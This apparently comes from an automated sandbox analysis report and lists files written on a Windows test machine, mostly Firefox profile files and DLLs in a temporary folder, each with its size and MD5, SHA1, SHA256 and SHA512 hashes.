Filesize948KB
MD5034ccadc1c073e4216e9466b720f9849
SHA1f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1
SHA25686e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f
SHA5125f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\opengl32sw.dll
Filesize14.5MB
MD53bd5aea364326cdfa667651a93e7a4c9
SHA1f33b4a83e038363c1a4df919e6f6e0e41dba9334
SHA25623f04ba936568e9a7c9dce7a6beb52c9be7eb13b734cd390c99e7546cbe1973d
SHA5127bd4e742b4d683b79de54eaf7d8b215252212921b8a53d1fbfc8e51ce43505c003da62fd126663bc04bbc65b8f77b85232c78ea6ecba8a4e425c28c0e9c80dc3
-
C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\LocalAppDataFolder\Corporation\platforms\qwindows.dll
Filesize1005KB
MD5be068132ece3f794f09c9d6b5ba20b91
SHA1859599fa72d128e33db6fe99ba95a8b63b15cc89
SHA25659dcecb111aa15159414819f4f522e7f90597939cab572b982beebee5dc0efdf
SHA51213829ae9b7bd0cba95800075b24570f3c70a6c4b3d4b3c4da76b0077e37c75194e929d8d56a2db69e22a319ba5077d188a6f3baedd1f69f79979717d6f6d1b6f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J91YUZ1UVSU72UXWM5IJ.temp
Filesize7KB
MD5117d8f5e1e6110c47a02239a403009e8
SHA12354e7372015ba525abc12c9cb14bd6afad6ff5b
SHA256a23089bfd1bf0ba5cc6e36a44ecfec70cc1b68540ae107f19cf8c5ca40035278
SHA5125b8c9f1f8b4a2d2e298fdc7ae57163edbaa6d0800b90745352b1445b639141f650ff28351b4cd2c6e51488c2f45cf2dae0ca7e74063969ab5c5b549d4360c558
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\db\data.safe.bin
Filesize9KB
MD5bc811fa12e9d84547bc3304f1c26ab34
SHA1fcded22a0c2f5c718bf118d836287871188c8b13
SHA2562763c2b0e60a09332167759ba22e99f96bd043ae089143d2d73502f1fd96df8c
SHA5128a5b74fc5286816001026c5de438e2ff05d5b3af28fca059f657cd0f76249eac05d31dbb723273cffaf58fec53c85aa61abdf0156a15fec197e63e238bbecb84
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\datareporting\glean\pending_pings\f4ab3a80-2055-4065-ac10-874ce4c6803b
Filesize733B
MD5e5aba69fbef7435d66489170ebb0285c
SHA1473c59a650a4c833f84840a371880502267584f5
SHA256147aa901be5d4efd26b486c32cf757576ad300b8b43f45050004536626463fd1
SHA512adb31cdec218a49f6299730d328a7c2654755b81f1ac2e64498542e85d8c0faa02479e5fd971a7860b648f637745131981b8ac1a11a22776368bff44cef4f45b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize372B
MD58be33af717bb1b67fbd61c3f4b807e9e
SHA17cf17656d174d951957ff36810e874a134dd49e0
SHA256e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA5126125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
7KB
MD5b2e9588e55ec22e9d60b63c3483c2872
SHA1ee1f434c092dc7909546a60a35342c40064a8106
SHA256be0a99287e2f712347e759248d95dce508524fbcd1656efc784e2676eeb63bb9
SHA5124b6c78b67152a6d98f63fe0147fb0b6dbcdd45334b2e889ebe88252e47e09f71b8449079f7bb43a276012e60c8143ade7811ca9e7b9d7d7ab1c7614c5c61a7ad
-
Filesize
6KB
MD5d72363378a9497700d87d423bd914c76
SHA1eb1534951a1985ac81a96aedeee942e03e228dba
SHA256e997ecb1fad9b8b3b64d951c41e4d4c3265533338f0209d7f52c18f7eb5f88e1
SHA51219f41f116f9cc5b5a8d904647d90d62bc831372356fdb61ad7ab773aeecdef5fbc054176748231b1bcb8249951125028a44fcd6c381e1acc15d73e37415de972
-
Filesize
7KB
MD5401efb95da1307e1f343c90f23c546e9
SHA15f479354caaf01f0f5ef5ed628869fcb426f2f8a
SHA2562e94aa59442a5252ab4f2747f121a8b61c7db728afa20dcb7bc3fa08d23c3435
SHA512128e52b634dabb277dff81b7a33d89c3600b9d12ab7d9e64a92e8a8fe8f3bdac86008a6e2eca2cbecdbf102b590817b375d6ddc2a2edbc98755e9aadca38f6ec
-
Filesize
6KB
MD5f572ea1ded6deb771cc4bde00b0ea2dd
SHA1edc28a4393453a35c45bbf6133c35fc54a69d311
SHA256cab65fdc548fb0eb5167ded8dd32aae0abd915314be7eda8d3394414bdbaad4a
SHA512ca379483cf1922733288271464ef24e064ff643a60b47658cd82091ada884aa801efbbe615eb96f55b73981268d13a597246df5f375dc5bd825691378954196c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD526376077fb667d332b98aa000a16391e
SHA12e85a6fd3226a382aeec6e53d6ff474b47189fc3
SHA256689fe70ede68a7df8b75955fca8e795365bc9b77db24f142e8ced95de0b711fb
SHA5127a739ea3b8345ae6bea2819e1398f88b8a8bcf6a737ec31ae1f2f6efe6f0787f40fcca19f97b31c33f3c70c8c535a40520fbab47597e713f3544de408fd58017
-
Filesize
703KB
MD593a39fec52c5a31eebddb1fefaf70377
SHA1ea09fb38f4468883ce54619b2196f9531909523f
SHA25641f0a1e447cd4a83ebb301907d8d5a37cb52235c126f55bd0bd04327b77136bc
SHA5121439d6333872963aa14c8199fdd864a36f7e7d8cc603c4013ed39333dee3d8ea937f11aadf19a6737f5884e2269ff7ca13fedbd5cad8838719838e9d44a156b3
-
Filesize
414KB
MD530959eddf9fbd69c18b43035e3f28be0
SHA16d4973ed29f13535b7b7b04bdc90724212f7b54a
SHA2569ddcdf44f1ec97074da94803acec5531114d21ee748e99375a0008d966518914
SHA512b4e3ec1ba4dc97227efd8de2dc7dcc026bd2881addb3319d9f34556c4a7e154b521ecb689862f9b44e59a351775e7af519c11524f381e5a4293f0f289c3057f8
-
Filesize
578KB
MD589afe34385ab2b63a7cb0121792be070
SHA156cdf3f32d03aa4a175fa69a33a21aaf5b42078d
SHA25636e35eafc91451a38ad7e7958156841cd2f004d5791fd862d5afa4d5f9df9103
SHA51214a851b3b4d3b8dbb9a2b3ea84d3c30fc9884a8924af0726a717c68db5e8f5e717dc78ca62e5f455010e46c1fecf294791b89f7426cc14ffdd4c84945518bb9c
-
Filesize
7KB
MD511092c1d3fbb449a60695c44f9f3d183
SHA1b89d614755f2e943df4d510d87a7fc1a3bcf5a33
SHA2562cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77
SHA512c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a